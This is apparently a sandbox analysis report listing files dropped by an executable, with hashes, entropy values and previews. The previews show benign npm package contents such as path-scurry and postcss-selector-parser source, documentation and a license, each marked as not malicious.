              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):64089
              Entropy (8bit):4.346744242024962
              Encrypted:false
              SSDEEP:
              MD5:6A71863F4C7E0DF1EF657A5F319C6E12
              SHA1:64AFC3F6F14289B2DF71B41F33DA1E6011FEECEE
              SHA-256:D94B35D707175B6D07A888508EB31406E39409AA8A124D538CE3A8CDB329BCE4
              SHA-512:7CF473094C6BBBFBEC6FBC5FAB720921DF48A9E205016050012D8DDA0EF355E26A45480F8793E062968C0996917973C84C4116E251B7F7546D21443C9CBC4AD8
              Malicious:false
              Reputation:unknown
              Preview:import { LRUCache } from 'lru-cache';.import { posix, win32 } from 'path';.import { fileURLToPath } from 'url';.import * as actualFS from 'fs';.import { lstatSync, readdir as readdirCB, readdirSync, readlinkSync, realpathSync as rps, } from 'fs';.const realpathSync = rps.native;.// TODO: test perf of fs/promises realpath vs realpathCB,.// since the promises one uses realpath.native.import { lstat, readdir, readlink, realpath } from 'fs/promises';.import { Minipass } from 'minipass';.const defaultFS = {. lstatSync,. readdir: readdirCB,. readdirSync,. readlinkSync,. realpathSync,. promises: {. lstat,. readdir,. readlink,. realpath,. },.};.// if they just gave us require('fs') then use our default.const fsFromOption = (fsOption) => !fsOption || fsOption === defaultFS || fsOption === actualFS. ? defaultFS. : {. ...defaultFS,. ...fsOption,. promises: {. ...defaultFS.promises,. ...(fsOption.prom
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2169
              Entropy (8bit):4.701421070125841
              Encrypted:false
              SSDEEP:
              MD5:83E854A9093200A7FC978812DDA7DA46
              SHA1:06CFB9610D73945ED2092BF9573717442FCADF79
              SHA-256:0B9C8B1344121C065650E5ADD8E44258F2193F50CF214A642A707D266109540A
              SHA-512:7800DCC354757B8BB7DE5E11931342E1D7FBAE0C4923D779CFE6A4CA95BFAC80120D510EF0E3FB10158BE26BEE1A5D4B1B9FC155FAD5C014B6101D0C9BD1DB87
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "path-scurry",. "version": "1.10.1",. "description": "walk paths fast and efficiently",. "author": "Isaac Z. Schlueter <i@izs.me> (https://blog.izs.me)",. "main": "./dist/cjs/index.js",. "module": "./dist/mjs/index.js",. "exports": {. ".": {. "import": {. "types": "./dist/mjs/index.d.ts",. "default": "./dist/mjs/index.js". },. "require": {. "types": "./dist/cjs/index.d.ts",. "default": "./dist/cjs/index.js". }. }. },. "files": [. "dist". ],. "license": "BlueOak-1.0.0",. "scripts": {. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags",. "preprepare": "rm -rf dist",. "prepare": "tsc -p tsconfig.json && tsc -p tsconfig-esm.json",. "postprepare": "bash ./scripts/fixup.sh",. "pretest": "npm run prepare",. "presnap": "npm run prepare",. "test": "c8 tap",. "snap": "c8 tap",. "format": "prettier --write . --loglevel warn",.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):21002
              Entropy (8bit):4.801032361127471
              Encrypted:false
              SSDEEP:
              MD5:FDA8C7E0330F125DD1C89E8175255676
              SHA1:E3DC8CC2FABC31722374719E059066CE970A6CFB
              SHA-256:8A4FAF30DE19D99DCEF9E193977C351375A9A1860FBBBD0FFF00421CE4795EDF
              SHA-512:B2612E31F8E5323781D0B34593FCFB9DA22BBB858FC2E7E288DE5F09DB72E3B42BA836BF2B80FC9B17F2AE8D301E4F6FAFB479BEBA7E827FCF259BFCB0AAC2BF
              Malicious:false
              Reputation:unknown
              Preview:# API Documentation..*Please use only this documented API when working with the parser. Methods.not documented here are subject to change at any point.*..## `parser` function..This is the module's main entry point...```js.const parser = require('postcss-selector-parser');.```..### `parser([transform], [options])`..Creates a new `processor` instance..```js.const processor = parser();.```..Or, with optional transform function..```js.const transform = selectors => {. selectors.walkUniversals(selector => {. selector.remove();. });.};..const processor = parser(transform)..// Example.const result = processor.processSync('*.class');.// => .class.```..[See processor documentation](#processor)..Arguments:..* `transform (function)`: Provide a function to work with the parsed AST..* `options (object)`: Provide default options for all calls on the returned `Processor`...### `parser.attribute([props])`..Creates a new attribute selector...```js.parser.attribute({attribute: 'href'});.//
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1092
              Entropy (8bit):5.13300516337869
              Encrypted:false
              SSDEEP:
              MD5:5A9C687FBBD43EB51C08313A2CBBF60D
              SHA1:EE54F5816E76951D69C639C71C6A04D0D52F54E2
              SHA-256:2998094B38F7ACE25F141FB36F334D8338F65A1812978D618B1161F4D77AE10E
              SHA-512:7BBEFBB259BD5D43DB5FFAE6CA38F38642C487760D812B0249897FB5F1F8A0EF4AB1EF7306D4054FF32310E9613FCFAEF5B9278CCBB70F81D91282A2C02C6D06
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) Ben Briggs <beneb.info@gmail.com> (http://beneb.info)..Permission is hereby granted, free of charge, to any person.obtaining a copy of this software and associated documentation.files (the "Software"), to deal in the Software without.restriction, including without limitation the rights to use,.copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following.conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES.OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT.HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,.WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FR
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (809)
              Category:dropped
              Size (bytes):1684
              Entropy (8bit):4.971679986555354
              Encrypted:false
              SSDEEP:
              MD5:917B7DB70F99D38C82CCD50FCF925C35
              SHA1:FAF36817CE25FAD362F1CDADCD099144DD3312F2
              SHA-256:7EC70D8AD4116EFC9BCB5240F6685DBB70102EFECA742811B01AAEB1FD43ED8D
              SHA-512:A4197AEA85B810019ADA25ADAB0F98898C5A7C0E41400C54AE3821069086CFAB40E2F5BC79967CA359D6F606DE3E8F62CCBF7DE50A3F2F2F72F8A532E9D44194
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _processor = _interopRequireDefault(require("./processor"));.var selectors = _interopRequireWildcard(require("./selectors"));.function _getRequireWildcardCache(nodeInterop) { if (typeof WeakMap !== "function") return null; var cacheBabelInterop = new WeakMap(); var cacheNodeInterop = new WeakMap(); return (_getRequireWildcardCache = function _getRequireWildcardCache(nodeInterop) { return nodeInterop ? cacheNodeInterop : cacheBabelInterop; })(nodeInterop); }.function _interopRequireWildcard(obj, nodeInterop) { if (!nodeInterop && obj && obj.__esModule) { return obj; } if (obj === null || typeof obj !== "object" && typeof obj !== "function") { return { "default": obj }; } var cache = _getRequireWildcardCache(nodeInterop); if (cache && cache.has(obj)) { return cache.get(obj); } var newObj = {}; var hasPropertyDescriptor = Object.defineProperty && Object.getOwnPropertyDescriptor; for (var key in obj) { if (key !== "
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (809)
              Category:dropped
              Size (bytes):38824
              Entropy (8bit):4.799914974349548
              Encrypted:false
              SSDEEP:
              MD5:E030837C4A2A8DBE99BBC614352E7026
              SHA1:2B0E2B8C8C18DC697AC984F33FAB5653D9113DEF
              SHA-256:6086D51F95547D5371D0F9C9D5ECE727BABE78E4FF314EDAF7AADCFCF9FA0E26
              SHA-512:34266F7F3BCA07FE515AC00B08B8720C41EE576F09F5060339EC3B7D5746318D92A57AA136AD6A1083E154A877A2842EF293653D69269216289322DE847A84BC
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _root = _interopRequireDefault(require("./selectors/root"));.var _selector = _interopRequireDefault(require("./selectors/selector"));.var _className = _interopRequireDefault(require("./selectors/className"));.var _comment = _interopRequireDefault(require("./selectors/comment"));.var _id = _interopRequireDefault(require("./selectors/id"));.var _tag = _interopRequireDefault(require("./selectors/tag"));.var _string = _interopRequireDefault(require("./selectors/string"));.var _pseudo = _interopRequireDefault(require("./selectors/pseudo"));.var _attribute = _interopRequireWildcard(require("./selectors/attribute"));.var _universal = _interopRequireDefault(require("./selectors/universal"));.var _combinator = _interopRequireDefault(require("./selectors/combinator"));.var _nesting = _interopRequireDefault(require("./selectors/nesting"));.var _sortAscending = _interopRequireDefault(require("./sortAscending"));.var _tokeni
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5210
              Entropy (8bit):4.501433825223546
              Encrypted:false
              SSDEEP:
              MD5:EEB91DE4CA8DBFC417077EEADCAB7E31
              SHA1:7B40423B58DD43853BBF0934AFC40C0E9A62CB06
              SHA-256:4A7B6D47076D57D9D14FA818D3DEFDECBC7EBE00975ACCBC08D73AC9F6849D47
              SHA-512:B84050BB5C8DDFB38F7269FC81417092FD1FE80F5C19E20E20E65976DC40B38754F37B19FACD9653135AFDF4FA1FD2570DFD189AF8B28162E97EF7B798569BF0
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _parser = _interopRequireDefault(require("./parser"));.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.var Processor = /*#__PURE__*/function () {. function Processor(func, options) {. this.func = func || function noop() {};. this.funcRes = null;. this.options = options;. }. var _proto = Processor.prototype;. _proto._shouldUpdateSelector = function _shouldUpdateSelector(rule, options) {. if (options === void 0) {. options = {};. }. var merged = Object.assign({}, this.options, options);. if (merged.updateSelector === false) {. return false;. } else {. return typeof rule !== "string";. }. };. _proto._isLossy = function _isLossy(options) {. if (options === void 0) {. options = {};. }. var merged = Object.assign({}, this.options, options);. if (merged.lossless === false) {. return true;. } else {
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (317)
              Category:dropped
              Size (bytes):16847
              Entropy (8bit):4.779874312550322
              Encrypted:false
              SSDEEP:
              MD5:D7531BBAF3301873C635833E7153B01F
              SHA1:AC433BC369D2278E2991CC316B5DEF6E7E231C32
              SHA-256:A6F8D7A3874CB7ACF3042728769372BD78B1B520461B68188477BA05F0F0E9F4
              SHA-512:FA1DB4BF227F7B264F02381E2817BE318FCB413C72649E0B2EC617ADD8C308C267FFF6D74B2F6DB63AD6B5E95628693A367399FFD22E0A4DE96869DB27F14337
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.exports.unescapeValue = unescapeValue;.var _cssesc = _interopRequireDefault(require("cssesc"));.var _unesc = _interopRequireDefault(require("../util/unesc"));.var _namespace = _interopRequireDefault(require("./namespace"));.var _types = require("./types");.var _CSSESC_QUOTE_OPTIONS;.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } }.function _createClass(Constructor, protoProps, staticProps) { if (protoProps) _defineProperties(Constructor.prototype, protoProps); if (staticProps) _defineProperties(Constructor, staticProps); Object.defineProperty(Constructor,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (317)
              Category:dropped
              Size (bytes):2346
              Entropy (8bit):4.833428301730698
              Encrypted:false
              SSDEEP:
              MD5:2DA231F4CB5E4D23B98484C508D39560
              SHA1:0AA0BB7896A14591935B82EA1C683B0E724F6F28
              SHA-256:449ADB6ECD5CAF5883A25A420CFE96E3E0E54F5E8A8C087F91D1A73C7B79C965
              SHA-512:9C6B59A4C616368C4C2938B50084356A2E77F55E4E49ADD5F99963596117BA0ECFAD891A8156390CFF989F3FBC4488900C9CC51CEFF10081EC776FDC25D7F90D
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _cssesc = _interopRequireDefault(require("cssesc"));.var _util = require("../util");.var _node = _interopRequireDefault(require("./node"));.var _types = require("./types");.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } }.function _createClass(Constructor, protoProps, staticProps) { if (protoProps) _defineProperties(Constructor.prototype, protoProps); if (staticProps) _defineProperties(Constructor, staticProps); Object.defineProperty(Constructor, "prototype", { writable: false }); return Constructor; }.function _inheritsLoose(subClass, superClass) { su
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):989
              Entropy (8bit):4.9430594799118746
              Encrypted:false
              SSDEEP:
              MD5:A4402B7B4D35D136AECF7B827C89323A
              SHA1:2A0B2A2BE91765234A3797B2AAD7B36523EEA6A8
              SHA-256:1750668A7A9CD6AA58DE63D1B547C7B7D67454B00071BD0D2D9334D948E3CBA5
              SHA-512:0BBC592033266CF39E1CEAC4778F58594636EEB1B54EC453A1CE039D8BF25A726E7DC3D1D8C415B48555BABC1A124BFC44D6744AB3B58F3A8192B009C08D9056
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _node = _interopRequireDefault(require("./node"));.var _types = require("./types");.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.constructor = subClass; _setPrototypeOf(subClass, superClass); }.function _setPrototypeOf(o, p) { _setPrototypeOf = Object.setPrototypeOf ? Object.setPrototypeOf.bind() : function _setPrototypeOf(o, p) { o.__proto__ = p; return o; }; return _setPrototypeOf(o, p); }.var Combinator = /*#__PURE__*/function (_Node) {. _inheritsLoose(Combinator, _Node);. function Combinator(opts) {. var _this;. _this = _Node.call(this, opts) || this;. _this.type = _types.COMBINATOR;. return _this;. }. return Combinator;.}(_node["default"]);.exports["default"] = Combinator;.module.exports = exports.default;
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):971
              Entropy (8bit):4.930770219957097
              Encrypted:false
              SSDEEP:
              MD5:EF28859040EBAB95E1C85CDF1C0D7DCC
              SHA1:AE09EEB0F4ADD80FF8F34F8509F85F12C722014A
              SHA-256:174CF0FD0FFABB785E2FA5F586EB01FCC64905FDA99A167963C23712F85FCCA0
              SHA-512:72122783B7799528212DD46DCE4CA61E57B345D284D82862081ADB6886E89B28CF13CCE143CF54976BCDF62DE4B580BD88A71C35DE9DA46FC873D2CF81489B54
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _node = _interopRequireDefault(require("./node"));.var _types = require("./types");.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.constructor = subClass; _setPrototypeOf(subClass, superClass); }.function _setPrototypeOf(o, p) { _setPrototypeOf = Object.setPrototypeOf ? Object.setPrototypeOf.bind() : function _setPrototypeOf(o, p) { o.__proto__ = p; return o; }; return _setPrototypeOf(o, p); }.var Comment = /*#__PURE__*/function (_Node) {. _inheritsLoose(Comment, _Node);. function Comment(opts) {. var _this;. _this = _Node.call(this, opts) || this;. _this.type = _types.COMMENT;. return _this;. }. return Comment;.}(_node["default"]);.exports["default"] = Comment;.module.exports = exports.default;
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2371
              Entropy (8bit):4.759926895279846
              Encrypted:false
              SSDEEP:
              MD5:6B0AF2D0D827EA6D4AC97852CB85848A
              SHA1:7067B513A7BA4DA81931F6FB11AD11C1A823D6F8
              SHA-256:EB3E007743C21134BA2F67951FB1082B9368D3ED501A952411E2F4B7B4904A5B
              SHA-512:9D7D00721411AD99E9BCB2440F32608BCFF8589FBA296711F21D3F259EC774FA01FFA455D39653773A4E96485FB5FBC4EA29644EBF87C9D8F96268ACB8C37AEA
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports.universal = exports.tag = exports.string = exports.selector = exports.root = exports.pseudo = exports.nesting = exports.id = exports.comment = exports.combinator = exports.className = exports.attribute = void 0;.var _attribute = _interopRequireDefault(require("./attribute"));.var _className = _interopRequireDefault(require("./className"));.var _combinator = _interopRequireDefault(require("./combinator"));.var _comment = _interopRequireDefault(require("./comment"));.var _id = _interopRequireDefault(require("./id"));.var _nesting = _interopRequireDefault(require("./nesting"));.var _pseudo = _interopRequireDefault(require("./pseudo"));.var _root = _interopRequireDefault(require("./root"));.var _selector = _interopRequireDefault(require("./selector"));.var _string = _interopRequireDefault(require("./string"));.var _tag = _interopRequireDefault(require("./tag"));.var _universal = _interopRequireDefault(require("./universal"));.function _inte
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (809)
              Category:dropped
              Size (bytes):11850
              Entropy (8bit):4.803512069471081
              Encrypted:false
              SSDEEP:
              MD5:73C9F817C5301430FF5063131E153002
              SHA1:74810D747BF6DE365D95A08D2247069543714768
              SHA-256:AA1C4617A87FB4A59ECA720ABA439CAC3970DF728FD827B5C4B615768E110CE7
              SHA-512:BB6AAEE00B9794AED9DB5BFC1400CE9B3F8D01407131E81B3FCB1BB95715E166AB09923A82A4045507E62559C1F4F265F5914E59B932429F6C86FB82D92996A3
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _node = _interopRequireDefault(require("./node"));.var types = _interopRequireWildcard(require("./types"));.function _getRequireWildcardCache(nodeInterop) { if (typeof WeakMap !== "function") return null; var cacheBabelInterop = new WeakMap(); var cacheNodeInterop = new WeakMap(); return (_getRequireWildcardCache = function _getRequireWildcardCache(nodeInterop) { return nodeInterop ? cacheNodeInterop : cacheBabelInterop; })(nodeInterop); }.function _interopRequireWildcard(obj, nodeInterop) { if (!nodeInterop && obj && obj.__esModule) { return obj; } if (obj === null || typeof obj !== "object" && typeof obj !== "function") { return { "default": obj }; } var cache = _getRequireWildcardCache(nodeInterop); if (cache && cache.has(obj)) { return cache.get(obj); } var newObj = {}; var hasPropertyDescriptor = Object.defineProperty && Object.getOwnPropertyDescriptor; for (var key in obj) { if (key !== "default" && Object
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (428)
              Category:dropped
              Size (bytes):2691
              Entropy (8bit):5.140255781906298
              Encrypted:false
              SSDEEP:
              MD5:315C3088FDE5794076FC536C3A8A8AF2
              SHA1:31C4DCE84E4669C33249A51F1732D59354619DEE
              SHA-256:6A5952B48B08FAA511E48D98455FAD4D96B0911D2AD9EE25D68F8027DE9A437F
              SHA-512:305CC80F1E51385BE166D40594E6008DE61E12DF7F5E44CC528B7A68BA03C89B11F845DE41FD50656130C3B6369DFA15B1B5A013DDBA9CDDFC9C998AF835A57F
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports.isComment = exports.isCombinator = exports.isClassName = exports.isAttribute = void 0;.exports.isContainer = isContainer;.exports.isIdentifier = void 0;.exports.isNamespace = isNamespace;.exports.isNesting = void 0;.exports.isNode = isNode;.exports.isPseudo = void 0;.exports.isPseudoClass = isPseudoClass;.exports.isPseudoElement = isPseudoElement;.exports.isUniversal = exports.isTag = exports.isString = exports.isSelector = exports.isRoot = void 0;.var _types = require("./types");.var _IS_TYPE;.var IS_TYPE = (_IS_TYPE = {}, _IS_TYPE[_types.ATTRIBUTE] = true, _IS_TYPE[_types.CLASS] = true, _IS_TYPE[_types.COMBINATOR] = true, _IS_TYPE[_types.COMMENT] = true, _IS_TYPE[_types.ID] = true, _IS_TYPE[_types.NESTING] = true, _IS_TYPE[_types.PSEUDO] = true, _IS_TYPE[_types.ROOT] = true, _IS_TYPE[_types.SELECTOR] = true, _IS_TYPE[_types.STRING] = true, _IS_TYPE[_types.TAG] = true, _IS_TYPE[_types.UNIVERSAL] = true, _IS_TYPE);.function isNode(node)
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1086
              Entropy (8bit):4.960833102095055
              Encrypted:false
              SSDEEP:
              MD5:B612F7A378AC939761116CC15AF4A2FA
              SHA1:60C11C605B9B27BCDFF37E93071390750B9D2121
              SHA-256:09C5CAE8EB7568C4526CE6CF09871F7694C77DB7094E3CF01893A9998B0155A0
              SHA-512:D1113F841803C0F2B4BC0C440108D4E94E09DCCE36F1CE7E9552000A09CE1392B2A236ED2EEDEEC9013E69F52D9BF052C2CBD760276236C14399170F815C3396
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _node = _interopRequireDefault(require("./node"));.var _types = require("./types");.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.constructor = subClass; _setPrototypeOf(subClass, superClass); }.function _setPrototypeOf(o, p) { _setPrototypeOf = Object.setPrototypeOf ? Object.setPrototypeOf.bind() : function _setPrototypeOf(o, p) { o.__proto__ = p; return o; }; return _setPrototypeOf(o, p); }.var ID = /*#__PURE__*/function (_Node) {. _inheritsLoose(ID, _Node);. function ID(opts) {. var _this;. _this = _Node.call(this, opts) || this;. _this.type = _types.ID;. return _this;. }. var _proto = ID.prototype;. _proto.valueToString = function valueToString() {. return '#' + _Node.prototype.valueToString.call(this);. };. retu
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):774
              Entropy (8bit):4.810858641884499
              Encrypted:false
              SSDEEP:
              MD5:4CADD48D0EA705C6A2FACC59C998CD34
              SHA1:12DDF80A69742DBB23D8936BED7AFC907B922AB1
              SHA-256:F5CD41186CF69D040C5F84CA1690842EF815B315F60973B88CDF8B3FF14C5302
              SHA-512:C3C792776ABC35FCB6706270AC4B02AD67C8BEDB826E4DFFA24C78A22055D1AA77DC851018DFA87CE48B17E2893A32F463CCE03A010C84DCDBFC692BD7433605
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.var _types = require("./types");.Object.keys(_types).forEach(function (key) {. if (key === "default" || key === "__esModule") return;. if (key in exports && exports[key] === _types[key]) return;. exports[key] = _types[key];.});.var _constructors = require("./constructors");.Object.keys(_constructors).forEach(function (key) {. if (key === "default" || key === "__esModule") return;. if (key in exports && exports[key] === _constructors[key]) return;. exports[key] = _constructors[key];.});.var _guards = require("./guards");.Object.keys(_guards).forEach(function (key) {. if (key === "default" || key === "__esModule") return;. if (key in exports && exports[key] === _guards[key]) return;. exports[key] = _guards[key];.});
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (317)
              Category:dropped
              Size (bytes):3061
              Entropy (8bit):4.728058446109981
              Encrypted:false
              SSDEEP:
              MD5:58ADAD20548FC45AD95FEA9761C8BB14
              SHA1:0F04FFFAC04B4D4F310006CA7D5B30F6670E1226
              SHA-256:B96A0FF0E14B73CC8E001E4F9EC6D3CCF7D6A0E182DF68066F176BA37F2D03F1
              SHA-512:1B475D3DD27F4F2C2A7A0A0CE782F42159443C15A081AC362A6F7B3BBBEEA58BF338200B3CBDB77CC709D8E3CD418091DEBBB65EAD62A54EBE65C7DFAE368F3F
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _cssesc = _interopRequireDefault(require("cssesc"));.var _util = require("../util");.var _node = _interopRequireDefault(require("./node"));.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } }.function _createClass(Constructor, protoProps, staticProps) { if (protoProps) _defineProperties(Constructor.prototype, protoProps); if (staticProps) _defineProperties(Constructor, staticProps); Object.defineProperty(Constructor, "prototype", { writable: false }); return Constructor; }.function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):994
              Entropy (8bit):4.9511961297901665
              Encrypted:false
              SSDEEP:
              MD5:7866EF7E21C35278B5632ED4246A8DB5
              SHA1:50243157DB2BEBBD126A396EBD0A5E0E16DE9ADB
              SHA-256:CA0876FB9A5755D8A7006DDE54217E24E5F12F58C7BE096E32E1631A82897E43
              SHA-512:00BFF2EDCBDC8C08931FD8FDAE99FCFD2D1CE56550857C476D3F57CC8AA42E6B67CBC5701F50669F17F5F17EF87F260ED4D757796F618FC770B712CD9793A5BF
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _node = _interopRequireDefault(require("./node"));.var _types = require("./types");.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.constructor = subClass; _setPrototypeOf(subClass, superClass); }.function _setPrototypeOf(o, p) { _setPrototypeOf = Object.setPrototypeOf ? Object.setPrototypeOf.bind() : function _setPrototypeOf(o, p) { o.__proto__ = p; return o; }; return _setPrototypeOf(o, p); }.var Nesting = /*#__PURE__*/function (_Node) {. _inheritsLoose(Nesting, _Node);. function Nesting(opts) {. var _this;. _this = _Node.call(this, opts) || this;. _this.type = _types.NESTING;. _this.value = '&';. return _this;. }. return Nesting;.}(_node["default"]);.exports["default"] = Nesting;.module.exports = exports.default;
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (317)
              Category:dropped
              Size (bytes):6690
              Entropy (8bit):4.680345554958275
              Encrypted:false
              SSDEEP:
              MD5:C8E2F6AED6D7F2837AEE747CD5D3A037
              SHA1:9BC3AB10ABA9A100B7F9A5B09D4D499AEB2C31FD
              SHA-256:4289E3C3D5ABED00BA52763A35CA89C4C4C293633C8193E6B21BDA2A88D69AE9
              SHA-512:8FF9C18D24B81AFDE26DB72A238032E81DC5FF424B4BB13EF2FD5D1069723331FAF6E4C3EBA496085D0B8F8C99CF8B542F82CA00E893C5B6037C7B891622DACD
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _util = require("../util");.function _defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } }.function _createClass(Constructor, protoProps, staticProps) { if (protoProps) _defineProperties(Constructor.prototype, protoProps); if (staticProps) _defineProperties(Constructor, staticProps); Object.defineProperty(Constructor, "prototype", { writable: false }); return Constructor; }.var cloneNode = function cloneNode(obj, parent) {. if (typeof obj !== 'object' || obj === null) {. return obj;. }. var cloned = new obj.constructor();. for (var i in obj) {. if (!obj.hasOwnProperty(i)) {. continue;. }. var value = obj[i];. var type = typeof value;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1255
              Entropy (8bit):4.956425439580541
              Encrypted:false
              SSDEEP:
              MD5:5765AD79A9CE61A90947373FA29FBA71
              SHA1:8F38746EA26C09182C21269B9E66E71B5EB8B62E
              SHA-256:A3CAE78D57FA9D4CC94FF36D5FFA96F88E3996F7A0A093E848D38BCA92EB67D1
              SHA-512:ED481EC8C5934F3339A84AEB940EF1838763BCB065DC1198D2A01754433CA5DB217287EF4838F60C6092BA252704247EFDF89D25A1FC715C55C7D8FB20E4AA0F
              Malicious:false
              Reputation:unknown
